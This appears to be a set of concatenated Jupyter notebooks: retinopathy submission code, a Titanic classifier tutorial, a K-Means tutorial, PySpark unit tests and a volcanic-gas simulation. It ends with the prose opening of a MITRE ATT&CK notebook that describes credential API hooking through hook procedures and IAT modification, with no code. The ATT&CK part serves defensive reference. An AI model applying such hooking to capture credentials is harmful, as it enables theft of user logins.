for i, pred in enumerate(preds_raw):
if pred < coef[0]:
preds[i] = 0
elif pred >= coef[0] and pred < coef[1]:
preds[i] = 1
elif pred >= coef[1] and pred < coef[2]:
preds[i] = 2
elif pred >= coef[2] and pred < coef[3]:
preds[i] = 3
else:
preds[i] = 4
return preds
optnm2qwk = pickle.load(open(f'{p_o}/optnm2qwk.p','rb'))
optnm2coefs = pickle.load(open(f'{p_o}/optnm2coefs.p','rb'))
optnm2qwk
coef = optnm2coefs['abhishek']
preds_tst_grd = bucket(preds_tst2use, coef)
Counter(preds_tst_grd.squeeze()).most_common()
```
## submit
```
subm = pd.read_csv("../input/aptos2019-blindness-detection/test.csv")
subm['diagnosis'] = preds_tst_grd.squeeze().astype(int)
subm.head()
subm.diagnosis.value_counts()
subm.to_csv(f"{p_o}/submission.csv", index=False)
```
|
github_jupyter
|
```
# from https://www.kaggle.com/carlbeckerling/kaggle-titanic-tutorial
import pandas as pd
test = pd.read_csv('./test.csv')
train = pd.read_csv('./train.csv')
test.shape,train.shape
test.info()
train.info()
import matplotlib.pyplot as plt
sex_pivot = train.pivot_table(index='Sex', values='Survived')
sex_pivot.plot.bar()
plt.show()
class_pivot = train.pivot_table(index='Pclass', values='Survived')
class_pivot.plot.bar()
plt.show()
train["Pclass"].unique()
train['Age'].describe()
train['Pclass'].describe()
survived = train[train['Survived'] == 1]
died = train[train['Survived'] == 0]
survived['Age'].plot.hist(alpha=0.5,color='red',bins=50)
died["Age"].plot.hist(alpha=0.5, color='blue', bins=50)
plt.legend(['Survived', 'Die','dda'])
plt.show()
def process_age(df, cut_points, label_names):
df['Age'] = df['Age'].fillna(-0.5)
df['Age_categories'] = pd.cut(df["Age"], cut_points, labels=label_names)
return df
cut_points = [-1, 0, 18, 100]
label_names = ['Missing', 'Child', 'Adult']
train = process_age(train, cut_points, label_names)
test = process_age(test, cut_points, label_names)
train['Age_categories'].describe()
holdout = process_age(holdout, [-1,0,5,12,18,35,60,100],['Missing','Infant','Child','Teenage', 'Young', 'Adult', 'Senior'])
train = process_age(train, [-1,0,5,12,18,35,60,100],['Missing','Infant','Child','Teenage', 'Young', 'Adult', 'Senior'])
age_categories_pivot = train.pivot_table(index='Age_categories', values='Survived')
age_categories_pivot.plot.bar()
plt.show()
def create_dummies(df, column_name):
dummies = pd.get_dummies(df[column_name], prefix=column_name)
df = pd.concat([df, dummies], axis=1)
return df
train = create_dummies(train, 'Pclass')
test = create_dummies(test, 'Pclass')
train.head()
train = create_dummies(train, 'Sex')
test = create_dummies(test, 'Sex')
train = create_dummies(train, 'Age_categories')
test = create_dummies(test, 'Age_categories')
train.head()
test.head()
```
# creating learning model
```
from sklearn.linear_model import LogisticRegression
lr = LogisticRegression()
columns = ['Pclass_2','Pclass_3', 'Sex_male']
lr.fit(train[columns], train['Survived'])
columns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male',
'Age_categories_Missing', 'Age_categories_Infant',
'Age_categories_Child', 'Age_categories_Teenage',
'Age_categories_Young', 'Age_categories_Adult',
'Age_categories_Senior']
lr.fit(train[columns], train['Survived'])
```
# splitting training data
```
holdout = test
from sklearn.model_selection import train_test_split
columns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male',
'Age_categories_Missing', 'Age_categories_Infant',
'Age_categories_Child', 'Age_categories_Teenage',
'Age_categories_Young', 'Age_categories_Adult',
'Age_categories_Senior']
all_X = train[columns]
all_y = train['Survived']
train_X, test_X, train_y, test_y = train_test_split(all_X, all_y, test_size=0.2, random_state=0)
lr = LogisticRegression()
lr.fit(train_X, train_y)
predictions = lr.predict(test_X)
from sklearn.metrics import accuracy_score
accuracy = accuracy_score(test_y, predictions)
accuracy
from sklearn.metrics import confusion_matrix
conf_matrix = confusion_matrix(test_y, predictions)
pd.DataFrame(conf_matrix, columns=[['Survived', 'Died']], index=[['Survived', 'Died']])
from sklearn.model_selection import cross_val_score
import numpy as np
lr = LogisticRegression()
scores = cross_val_score(lr, all_X, all_y, cv=10)
np.mean(scores)
holdout = process_age(holdout, [-1,0,5,12,18,35,60,100],['Missing','Infant','Child','Teenage', 'Young', 'Adult', 'Senior'])
holdout
columns
lr = LogisticRegression()
lr.fit(all_X, all_y)
holdout_predictions = lr.predict(holdout[columns])
holdout_predictions
columns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male',
'Age_categories_Missing','Age_categories_Infant',
'Age_categories_Child', 'Age_categories_Teenage',
'Age_categories_Young', 'Age_categories_Adult',
'Age_categories_Senior']
holdout = holdout.drop(['Age_categories_Adult','Age_categories_Child', 'Age_categories_Missing'], axis=1)
holdout.head()
holdout['Age_categories'].unique()
holdout = create_dummies(holdout, 'Age_categories')
holdout.info()
lr = LogisticRegression()
lr.fit(all_X, all_y)
holdout_predictions = lr.predict(holdout[columns])
holdout_predictions
holdout_ids = holdout["PassengerId"]
submission_df = {"PassengerId": holdout_ids, 'Survived': holdout_predictions}
submission = pd.DataFrame(submission_df)
submission.to_csv('titanic_submission.csv', index=False)
submission.head()
holdout = holdout.drop(['Age_categories_Adult'],axis=1)
holdout.info()
```
|
github_jupyter
|
<small><i>This notebook was put together by [Jake Vanderplas](http://www.vanderplas.com). Source and license info is on [GitHub](https://github.com/jakevdp/sklearn_tutorial/).</i></small>
# Clustering: K-Means In-Depth
Here we'll explore **K Means Clustering**, which is an unsupervised clustering technique.
We'll start with our standard set of initial imports
```
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
plt.style.use('seaborn')
```
## Introducing K-Means
K Means is an algorithm for **unsupervised clustering**: that is, finding clusters in data based on the data attributes alone (not the labels).
K Means is a relatively easy-to-understand algorithm. It searches for cluster centers which are the mean of the points within them, such that every point is closest to the cluster center it is assigned to.
Let's look at how KMeans operates on the simple clusters we looked at previously. To emphasize that this is unsupervised, we'll not plot the colors of the clusters:
```
from sklearn.datasets.samples_generator import make_blobs
X, y = make_blobs(n_samples=300, centers=4,
random_state=0, cluster_std=0.60)
plt.scatter(X[:, 0], X[:, 1], s=50);
```
By eye, it is relatively easy to pick out the four clusters. If you were to perform an exhaustive search for the different segmentations of the data, however, the search space would be exponential in the number of points. Fortunately, there is a well-known *Expectation Maximization (EM)* procedure which scikit-learn implements, so that KMeans can be solved relatively quickly.
```
from sklearn.cluster import KMeans
est = KMeans(4) # 4 clusters
est.fit(X)
y_kmeans = est.predict(X)
plt.scatter(X[:, 0], X[:, 1], c=y_kmeans, s=50, cmap='rainbow');
```
The algorithm identifies the four clusters of points in a manner very similar to what we would do by eye!
## The K-Means Algorithm: Expectation Maximization
K-Means is an example of an algorithm which uses an *Expectation-Maximization* approach to arrive at the solution.
*Expectation-Maximization* is a two-step approach which works as follows:
1. Guess some cluster centers
2. Repeat until converged
A. Assign points to the nearest cluster center
B. Set the cluster centers to the mean
Let's quickly visualize this process:
```
from fig_code import plot_kmeans_interactive
plot_kmeans_interactive();
```
This algorithm will (often) converge to the optimal cluster centers.
### KMeans Caveats
The convergence of this algorithm is not guaranteed; for that reason, scikit-learn by default uses a large number of random initializations and finds the best results.
Also, the number of clusters must be set beforehand... there are other clustering algorithms for which this requirement may be lifted.
## Application of KMeans to Digits
For a closer-to-real-world example, let's again take a look at the digits data. Here we'll use KMeans to automatically cluster the data in 64 dimensions, and then look at the cluster centers to see what the algorithm has found.
```
from sklearn.datasets import load_digits
digits = load_digits()
est = KMeans(n_clusters=10)
clusters = est.fit_predict(digits.data)
est.cluster_centers_.shape
```
We see ten clusters in 64 dimensions. Let's visualize each of these cluster centers to see what they represent:
```
fig = plt.figure(figsize=(8, 3))
for i in range(10):
ax = fig.add_subplot(2, 5, 1 + i, xticks=[], yticks=[])
ax.imshow(est.cluster_centers_[i].reshape((8, 8)), cmap=plt.cm.binary)
```
We see that *even without the labels*, KMeans is able to find clusters whose means are recognizable digits (with apologies to the number 8)!
The cluster labels are permuted; let's fix this:
```
from scipy.stats import mode
labels = np.zeros_like(clusters)
for i in range(10):
mask = (clusters == i)
labels[mask] = mode(digits.target[mask])[0]
```
For good measure, let's use our PCA visualization and look at the true cluster labels and K-means cluster labels:
```
from sklearn.decomposition import PCA
X = PCA(2).fit_transform(digits.data)
kwargs = dict(cmap = plt.cm.get_cmap('rainbow', 10),
edgecolor='none', alpha=0.6)
fig, ax = plt.subplots(1, 2, figsize=(8, 4))
ax[0].scatter(X[:, 0], X[:, 1], c=labels, **kwargs)
ax[0].set_title('learned cluster labels')
ax[1].scatter(X[:, 0], X[:, 1], c=digits.target, **kwargs)
ax[1].set_title('true labels');
```
Just for kicks, let's see how accurate our K-Means classifier is **with no label information:**
```
from sklearn.metrics import accuracy_score
accuracy_score(digits.target, labels)
```
80% – not bad! Let's check-out the confusion matrix for this:
```
from sklearn.metrics import confusion_matrix
print(confusion_matrix(digits.target, labels))
plt.imshow(confusion_matrix(digits.target, labels),
cmap='Blues', interpolation='nearest')
plt.colorbar()
plt.grid(False)
plt.ylabel('true')
plt.xlabel('predicted');
```
Again, this is an 80% classification accuracy for an **entirely unsupervised estimator** which knew nothing about the labels.
## Example: KMeans for Color Compression
One interesting application of clustering is in color image compression. For example, imagine you have an image with millions of colors. In most images, a large number of the colors will be unused, and conversely a large number of pixels will have similar or identical colors.
Scikit-learn has a number of images that you can play with, accessed through the datasets module. For example:
```
from sklearn.datasets import load_sample_image
china = load_sample_image("china.jpg")
plt.imshow(china)
plt.grid(False);
```
The image itself is stored in a 3-dimensional array, of size ``(height, width, RGB)``:
```
china.shape
```
We can envision this image as a cloud of points in a 3-dimensional color space. We'll rescale the colors so they lie between 0 and 1, then reshape the array to be a typical scikit-learn input:
```
X = (china / 255.0).reshape(-1, 3)
print(X.shape)
```
We now have 273,280 points in 3 dimensions.
Our task is to use KMeans to compress the $256^3$ colors into a smaller number (say, 64 colors). Basically, we want to find $N_{color}$ clusters in the data, and create a new image where the true input color is replaced by the color of the closest cluster.
Here we'll use ``MiniBatchKMeans``, a more sophisticated estimator that performs better for larger datasets:
```
from sklearn.cluster import MiniBatchKMeans
# reduce the size of the image for speed
n_colors = 64
X = (china / 255.0).reshape(-1, 3)
model = MiniBatchKMeans(n_colors)
labels = model.fit_predict(X)
colors = model.cluster_centers_
new_image = colors[labels].reshape(china.shape)
new_image = (255 * new_image).astype(np.uint8)
# create and plot the new image
with plt.style.context('seaborn-white'):
plt.figure()
plt.imshow(china)
plt.title('input: 16 million colors')
plt.figure()
plt.imshow(new_image)
plt.title('{0} colors'.format(n_colors))
```
Compare the input and output image: we've reduced the $256^3$ colors to just 64.
|
github_jupyter
|
```
%run ./dlt
%run ./dlt_workflow_refactored
from pyspark.sql import Row
import unittest
from pyspark.sql.functions import lit
import datetime
timestamp = datetime.datetime.fromisoformat("2000-01-01T00:00:00")
def timestamp_provider():
return lit(timestamp)
from pyspark.sql.functions import when, col
from pyspark.sql import Row
class FunctionUnitTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
container.register(
timestamp_provider=timestamp_provider
)
def test_add_ingest_columns(self):
df = spark.range(1)
df = df.transform(container.add_ingest_columns)
result = df.collect()
self.assertEqual(1, len(result), "Only one record expected")
self.assertIn("ingest_timestamp", df.columns, "Ingest timestamp column not present")
self.assertIn("ingest_source", df.columns, "Ingest source column not present")
self.assertEqual(url.split("/")[-1], result[0].ingest_source, "Ingest source not correct")
self.assertEqual(timestamp, result[0].ingest_timestamp, "Ingest timestamp not correct")
def test_add_processed_timestamp(self):
df = spark.range(1)
df = df.transform(container.add_processed_timestamp)
result = df.collect()
self.assertEqual(1, len(result), "Only one record expected")
self.assertIn("processed_timestamp", df.columns, "Processed timestamp column not present")
self.assertEqual(timestamp, result[0].processed_timestamp, "Processed timestamp not correct")
def test_add_null_index_array(self):
df = spark.createDataFrame([
Row(id=1, test_null=None),
Row(id=2, test_null=1)
])
df = df.transform(container.add_null_index_array)
result = df.collect()
self.assertEqual(2, len(result), "Two records are expected")
self.assertIn("nulls", df.columns, "Nulls column not present")
self.assertIsNone(result[0].test_null, "First record should contain null")
self.assertIsNotNone(result[1].test_null, "Second record should not contain null")
self.assertIn(1, result[0].nulls, "Nulls array should include 1")
self.assertIsNot(result[1].nulls, "Nulls array should be empty")
def test_filter_null_index_empty(self):
df = spark.createDataFrame([
Row(id=1, test_null=None, nulls=[1]),
Row(id=2, test_null=1, nulls=[])
])
df = df.transform(container.filter_null_index_empty)
result = df.collect()
self.assertEqual(1, len(result), "One record is expected")
self.assertNotIn("nulls", df.columns, "Nulls column not present")
def test_filter_null_index_not_empty(self):
df = spark.createDataFrame([
Row(id=1, test_null=None, nulls=[1]),
Row(id=2, test_null=1, nulls=[])
])
df = df.transform(container.filter_null_index_not_empty)
result = df.collect()
self.assertEqual(1, len(result), "One record is expected")
self.assertIn("nulls", df.columns, "Nulls column not present")
def test_agg_count_by_country(self):
df = spark.createDataFrame([
Row(country="Country0"),
Row(country="Country1"),
Row(country="Country0")
])
df = df.transform(container.agg_count_by_country)
result = df.collect()
self.assertEqual(2, len(result), "Two records expected")
self.assertIn("country", df.columns, "Country column not present")
self.assertIn("count", df.columns, "Count column not present")
d = {r[0]: r[1] for r in result}
self.assertEqual(2, d.get("Country0", -1), "Country0 count should be 2")
self.assertEqual(1, d.get("Country1", -1), "Country1 count should be 1")
```
|
github_jupyter
|
```
import numpy as np
from matplotlib import pyplot as plt
from joblib import Parallel, delayed
import multiprocessing
import time
from tqdm import tqdm
from VolcGases.functions import solve_gases
import warnings
warnings.filterwarnings('ignore')
# The total H and C mass fractions
mCO2tot=1000e-6
mH2Otot=1000e-6
# set total pressure and temperature
T = 1473 # kelvin
P = 1000 # bar
x = 0.01550152865954013
FMQ = 0
# set the Oxygen fugacity to FMQ
A = 25738
B = 9
C = 0.092
log_FMQ = (-A/T+B+C*(P-1)/T)
f_O2 = 10**(log_FMQ+FMQ)
# set to FMQ
start = time.time()
P_H2O,P_H2,P_CO2,P_CO,P_CH4,alphaG,x_CO2,x_H2O = solve_gases(T,P,f_O2,mCO2tot,mH2Otot)
print(time.time()-start)
print('H2O mix rat =','%.2e'%(P_H2O/P))
print('H2 mix rat =','%.2e'%(P_H2/P))
print('CO2 mix rat =','%.2e'%(P_CO2/P))
print('CO mix rat =','%.2e'%(P_CO/P))
print('CH4 mix rat =','%.2e'%(P_CH4/P))
print('alphaG =','%.2e'%alphaG)
# make distributions
np.random.seed(1)
n = 10000
inputs = range(0,n)
# change these too
mCO2toto_r=[-5,-2] # Approximate range in Earth MORB Wallace and Anderson 1999, Marty et al. 2012, Wallace 2005
mH2Ototo_r=[-5,-1] # Dissolved submarine range for Earth Wallace and Anderson 1999
# Figure 10
mCO2totc_r=[-5,-2] # Approximate range in Earth MORB Wallance and Anderson 1999, Marty et al. 2012, Wallace 2005
mH2Ototc_r=[-5,-1] # Dissolved subaerial range for Earth Wallace and Anderson 1999
# Figure 11
mCO2toto = 10**np.random.uniform(low=mCO2toto_r[0], high=mCO2toto_r[1], size=n)
mH2Ototo = 10**np.random.uniform(low=mH2Ototo_r[0], high=mH2Ototo_r[1], size=n)
mCO2totc = 10**np.random.uniform(low=mCO2totc_r[0], high=mCO2totc_r[1], size=n)
mH2Ototc = 10**np.random.uniform(low=mH2Ototc_r[0], high=mH2Ototc_r[1], size=n)
#mCO2totc = mCO2toto
#mH2Ototc = 10**mH2Ototo
# Choose range of T and P and fO2
Tc_r = [873,1973] # coldest magmas to Komatiite magmas ( ,Huppert et al. 1984)
Pc_r = [1e-3,100] # Roughly subaerial degassing pressure range in the solar system
To_r = [873,1973] # coldest magmas to Komatiite magmas ( ,Huppert et al. 1984)
Po_r = [100,1000] # Magma solubility doesn't allow for siginifcant degassing at higher pressure
f_O2_r = [-4,5] # Range of O2 fugacities observed on Earth (Stamper et al. 2014)
# White dwarfs pollution are evidence that similar O2 fuagacities on exoplanets (Doyle et al. 2019)
# encompasses O2 fugacity of martian meteorites (Catling and Kasting 2017)
X_r = [0,1] # 0% to 100% subaerial volcanism
LG = 1
Delta_f_O2 = np.random.uniform(low=f_O2_r[0], high=f_O2_r[1], size=n)
Tc = np.random.uniform(low=Tc_r[0], high=Tc_r[1], size=n)
Pc = np.random.uniform(low=Pc_r[0], high=Pc_r[1], size=n)
To = np.random.uniform(low=To_r[0], high=To_r[1], size=n)
Po = np.random.uniform(low=Po_r[0], high=Po_r[1], size=n)
X = np.random.uniform(low=X_r[0], high=X_r[1], size=n)
if LG==1:
# log stuff
Pc_r = [np.log10(Pc_r[0]),np.log10(Pc_r[1])]
Pc = 10**np.random.uniform(low=Pc_r[0], high=Pc_r[1], size=n)
# little bit more to get f_O2
A = 25738
B = 9
C = 0.092
log_fO2_c = (-A/Tc+B+C*(Pc-1)/Tc)+Delta_f_O2
f_O2_c = 10**(log_fO2_c)
log_fO2_o = (-A/To+B+C*(Po-1)/To)+Delta_f_O2
f_O2_o = 10**(log_fO2_o)
# ocean world
def flux_ratios_iter(T,P,f_O2,mCO2tot,mH2Otot):
P_H2O,P_H2,P_CO2,P_CO,P_CH4,alphaG,x_CO2,x_H2O = solve_gases(T,P,f_O2,mCO2tot,mH2Otot)
#CO_CO2 = P_CO/P_CO2
try:
CO_CO2 = P_CO2/P_CO
CO_CH4 = P_CH4/P_CO
except:
CO_CO2 = np.nan
CO_CH4 = np.nan
# CO2 = 1000*alphaG*x*(1/(1-alphaG))*P_CO2/P
# CH4 = 1000*alphaG*x*(1/(1-alphaG))*P_CH4/P
# CO = 1000*alphaG*x*(1/(1-alphaG))*P_CO/P
if P_H2O==0:
print('hi')
CO2 = 1000*alphaG*x*P_CO2/P
CH4 = 1000*alphaG*x*P_CH4/P
CO = 1000*alphaG*x*P_CO/P
return (CO_CO2,CO_CH4,CO,CH4,CO2)
num_cores = multiprocessing.cpu_count()
start = time.time()
resultso = Parallel(n_jobs=num_cores)(delayed(flux_ratios_iter)\
(To[i],Po[i],f_O2_o[i],mCO2toto[i],mH2Ototo[i]) for i in tqdm(inputs))
end = time.time()
print(end-start)
resultso = np.array(resultso)
# mix land-ocean world
def flux_ratios_iter(To,Tc,Po,Pc,f_O2_o,f_O2_c,mCO2toto,mH2Ototo,mCO2totc,mH2Ototc,X):
P_H2O_o,P_H2_o,P_CO2_o,P_CO_o,P_CH4_o,alphaG_o,x_CO2_o,x_H2O_o = solve_gases(To,Po,f_O2_o,mCO2toto,mH2Ototo)
P_H2O_c,P_H2_c,P_CO2_c,P_CO_c,P_CH4_c,alphaG_c,x_CO2_c,x_H2O_c = solve_gases(Tc,Pc,f_O2_c,mCO2totc,mH2Ototc)
# this gives mol gas/kg magma
# CO2_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CO2_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CO2_o/Po)
# CO_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CO_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CO_o/Po)
# CH4_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CH4_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CH4_o/Po)
CO2_b = X*(1000*alphaG_c*x*P_CO2_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CO2_o/Po)
CO_b = X*(1000*alphaG_c*x*P_CO_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CO_o/Po)
CH4_b = X*(1000*alphaG_c*x*P_CH4_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CH4_o/Po)
# this gives mol gas/kg magma
P_CO2_b = X*(P_CO2_c/Pc)+(1-X)*(P_CO2_o/Po)
P_CO_b = X*(P_CO_c/Pc)+(1-X)*(P_CO_o/Po)
P_CH4_b = X*(P_CH4_c/Pc)+(1-X)*(P_CH4_o/Po)
try:
CO_CO2 = P_CO2_b/P_CO_b
CO_CH4 = P_CH4_b/P_CO_b
except:
CO_CO2 = np.nan
CO_CH4 = np.nan
# CO_CO2 = X*(P_CO_c/P_CO2_c)+(1-X)*(P_CO_o/P_CO2_o)
# CO_CH4 = X*(P_CO_c/P_CH4_c)+(1-X)*(P_CO_o/P_CH4_o)
return (CO_CO2,CO_CH4,CO_b,CH4_b,CO2_b)
num_cores = multiprocessing.cpu_count()
start = time.time()
resultsb = Parallel(n_jobs=num_cores)(delayed(flux_ratios_iter)\
(To[i],Tc[i],Po[i],Pc[i],f_O2_o[i],f_O2_c[i],mCO2toto[i],mH2Ototo[i],mCO2totc[i],mH2Ototc[i],X[i]) for i in tqdm(inputs))
end = time.time()
print(end-start)
resultsb = np.array(resultsb)
#np.savetxt('ocean_world.txt',resultso)
#resultso = np.loadtxt('ocean_world.txt')
#np.savetxt('ocean_continent_combo.txt',resultsb)
#resultsb = np.loadtxt('ocean_continent_combo.txt')
plt.rcParams.update({'font.size': 18})
fig,[ax,ax1] = plt.subplots(1,2,figsize=[15,5])
results = resultsb
# xbins = np.linspace(np.log10(min(results[:,1])), np.log10(max(results[:,1])), 20)
# ybins = np.linspace(np.log10(min(results[:,0])), np.log10(max(results[:,0])), 20)
xbins = np.linspace(-27,5, 20)
ybins = np.linspace(-1, 5, 20)
counts1, _, _ = np.histogram2d(np.log10(results[:,1]), np.log10(results[:,0]), bins=(xbins, ybins),normed=True)
cs1 = ax1.pcolormesh(xbins, ybins, counts1.T,vmin=0, vmax=np.max(counts1))
#ax1.set_ylabel(r"$\log(\mathrm{CO}/\mathrm{CO_2})$")
#ax1.set_xlabel(r"$\log(\mathrm{CO}/\mathrm{CH_4})$")
ax1.set_ylabel(r"$\log(\mathrm{CO_2}/\mathrm{CO})$")
ax1.set_xlabel(r"$\log(\mathrm{CH_4}/\mathrm{CO})$")
#ax1.set_xticks(np.arange(0,22,5))
#cbar1 = plt.colorbar(cs1,ax=ax1)
#cbar1.set_label("Probability density")
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.82, 0.13, 0.02, 0.74])
cbar = fig.colorbar(cs1, cax=cbar_ax)
results = resultso
# xbins = np.linspace(np.log10(min(results[:,1])), np.log10(max(results[:,1])), 20)
# ybins = np.linspace(np.log10(min(results[:,0])), np.log10(max(results[:,0])), 20)
xbins = np.linspace(-27,5, 20)
ybins = np.linspace(-1, 5, 20)
#counts, _, _ = np.histogram2d(np.log10(results[:,1]), np.log10(results[:,0]), bins=(xbins, ybins),normed=True)
#cs = ax.pcolormesh(xbins, ybins, counts.T,vmin=0, vmax=np.max(counts1))
ax.hist2d(np.log10(results[:,1]), np.log10(results[:,0]),bins=(xbins, ybins),normed=True,vmax=np.max(counts1))
#ax.set_ylabel(r"$\log(\mathrm{CO}/\mathrm{CO_2})$")
#ax.set_xlabel(r"$\log(\mathrm{CO}/\mathrm{CH_4})$")
ax.set_ylabel(r"$\log(\mathrm{CO_2}/\mathrm{CO})$")
ax.set_xlabel(r"$\log(\mathrm{CH_4}/\mathrm{CO})$")
#cbar = plt.colorbar(cs,ax=ax)
cbar.set_label("Normalized count")
#ax.set_xticks(np.arange(0,22,5))
plt.subplots_adjust(wspace=.3)
ax.text(-0.15, 1.15, '(a)', transform=ax.transAxes,size=25)
ax1.text(-0.15, 1.15, '(b)', transform=ax1.transAxes,size=25)
ax.set_ylim(ax.get_ylim()[0],ax.get_ylim()[1])
ax.set_xlim(ax.get_xlim()[0],ax.get_xlim()[1])
ax1.set_ylim(ax1.get_ylim()[0],ax1.get_ylim()[1])
ax1.set_xlim(ax1.get_xlim()[0],ax1.get_xlim()[1])
ax.text(0.02, 0.05, 'Ocean world', transform=ax.transAxes,color='w')
ax1.text(0.02, 0.05, 'Earth-like world', transform=ax1.transAxes,color='w')
xxx = np.linspace(-40,10)
ax.plot(xxx,xxx*0,'w:')
ax.plot(xxx*0,xxx,'w:')
ax1.plot(xxx,xxx*0,'w:')
ax1.plot(xxx*0,xxx,'w:')
num_nan = np.sum(np.isnan(resultso[:,1]))
print('fraction of Ocean world calculations where CH4/CO2>1 = ',\
len(np.where(resultso[:,1][~np.isnan(resultso[:,1])]>1)[0])/(n-num_nan))
num_nan = np.sum(np.isnan(resultsb[:,1]))
print('fraction of Earth-like world calculations where CH4/CO2>1 = ',\
len(np.where(resultsb[:,1][~np.isnan(resultsb[:,1])]>1)[0])/(n-num_nan))
# ax.set_xlim(-27,5)
# ax.set_ylim(-1,5)
# plt.savefig("both.pdf",bbox_inches='tight')
plt.show()
plt.rcParams.update({'font.size': 18})
mod_earth = 30*3000*1e9
fig,[[ax2,ax3],[ax4,ax5]] = plt.subplots(2,2,figsize=[14,10])#,gridspec_kw={'height_ratios':[3,2]})
#ax.set_xticks(np.arange(0,22,5))
plt.subplots_adjust(wspace=.3,hspace=.35)
# ax.text(-0.15, 1.10, '(a)', transform=ax.transAxes,size=25)
# ax1.text(-0.15, 1.10, '(b)', transform=ax1.transAxes,size=25)
ax2.text(-0.15, 1.10, '(a)', transform=ax2.transAxes,size=25)
ax3.text(-0.15, 1.10, '(b)', transform=ax3.transAxes,size=25)
ax4.text(-0.15, 1.10, '(c)', transform=ax4.transAxes,size=25)
ax5.text(-0.15, 1.10, '(d)', transform=ax5.transAxes,size=25)
# ax.text(0.02, 0.05, 'Ocean world', transform=ax.transAxes,color='w')
# ax1.text(0.02, 0.05, 'Earth-like world', transform=ax1.transAxes,color='w')
ax2.text(0.02, 0.89, 'Ocean world', transform=ax2.transAxes,color='k')
ax3.text(0.02, 0.89, 'Earth-like world', transform=ax3.transAxes,color='k')
ax4.text(0.02, 0.89, 'Ocean world', transform=ax4.transAxes,color='k')
ax5.text(0.02, 0.89, 'Earth-like world', transform=ax5.transAxes,color='k')
ax4.arrow
#plt.savefig("both.pdf",bbox_inches='tight')
# now other things
bins = np.arange(-32,2,1.5)
ax2.set_xticks(np.arange(-32,1,6))
ax3.set_xticks(np.arange(-32,1,6))
ax2.hist(np.log10(resultso[:,3]),bins = bins,normed=True)
ax2.set_ylabel('Normalized count')
ax2.set_xlabel('log(mol $\mathrm{CH_4}$/kg magma)')
ax3.hist(np.log10(resultsb[:,3]),bins = bins,normed=True)
ax3.set_ylabel('Normalized count')
ax3.set_xlabel('log(mol $\mathrm{CH_4}$/kg magma)')
ax2.set_xlim(ax2.get_xlim()[0],ax2.get_xlim()[1])
ax3.set_xlim(ax2.get_xlim()[0],ax2.get_xlim()[1])
ax2.set_ylim(ax3.get_ylim()[0],ax3.get_ylim()[1])
ax3.set_ylim(ax3.get_ylim()[0],ax3.get_ylim()[1])
ax2.set_yticks([0.,0.02,0.04,0.06])
ax3.set_yticks([0.,0.02,0.04,0.06])
# now gas fluxes
bins1 = np.arange(-31,8,1.5)
ax4.set_xticks(np.arange(-30,2,6))
ax5.set_xticks(np.arange(-30,2,6))
ax4.hist(np.log10(resultso[:,3]*mod_earth/1e12),bins = bins1,normed=True)
ax4.set_ylabel('Normalized count')
ax4.set_xlabel('Methane flux (log(Tmol/yr))')
ax5.hist(np.log10(resultsb[:,3]*mod_earth/1e12),bins = bins1,normed=True)
ax5.set_ylabel('Normalized count')
ax5.set_xlabel('Methane flux (log(Tmol/yr))')
ax4.set_xlim(ax4.get_xlim()[0],3.5)
ax4.set_xlim(ax4.get_xlim()[0],ax4.get_xlim()[1])
ax5.set_xlim(ax4.get_xlim()[0],ax4.get_xlim()[1])
ax4.set_ylim(ax5.get_ylim()[0],ax5.get_ylim()[1])
ax5.set_ylim(ax5.get_ylim()[0],ax5.get_ylim()[1])
ax4.set_yticks([0.,0.02,0.04,0.06])
ax5.set_yticks([0.,0.02,0.04,0.06])
Ebio = 30
lims = ax4.get_xlim()
val = ((lims[1]-lims[0])-(lims[1]-np.log10(Ebio)))/(lims[1]-lims[0])
ax4.text(val,.71,'Mod.\nEarth\nbio.\nflux',ha='center',va='bottom', transform=ax4.transAxes,fontsize = 12)
ax4.arrow(val, .7, 0, -0.69, transform=ax4.transAxes, length_includes_head=True\
,head_width = .03,fc='k')
lims = ax5.get_xlim()
val = ((lims[1]-lims[0])-(lims[1]-np.log10(Ebio)))/(lims[1]-lims[0])
ax5.text(val,.61,'Mod.\nEarth\nbio.\nflux',ha='center',va='bottom', transform=ax5.transAxes,fontsize = 12)
ax5.arrow(val, .6, 0, -0.59, transform=ax5.transAxes, length_includes_head=True\
,head_width = .03,fc='k')
volc_flux = 1
print('Fraction ocean world calulations where CH4 > 10 Tmol assuming\n'+str(volc_flux)+\
' times Earths magma production rate =',1-(np.sum(resultso[:,3]*volc_flux*mod_earth/1e12 < 10))/n)
print()
print('Fraction Earth-like world calulations where CH4 > 10 Tmol assuming\n'+str(volc_flux)+\
' times Earths magma production rate =',1-(np.sum(resultsb[:,3]*volc_flux*mod_earth/1e12 < 10))/n)
# plt.savefig("CH4_prod.pdf",bbox_inches='tight')
plt.show()
```
|
github_jupyter
|
# T1056.004 - Input Capture: Credential API Hooking
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
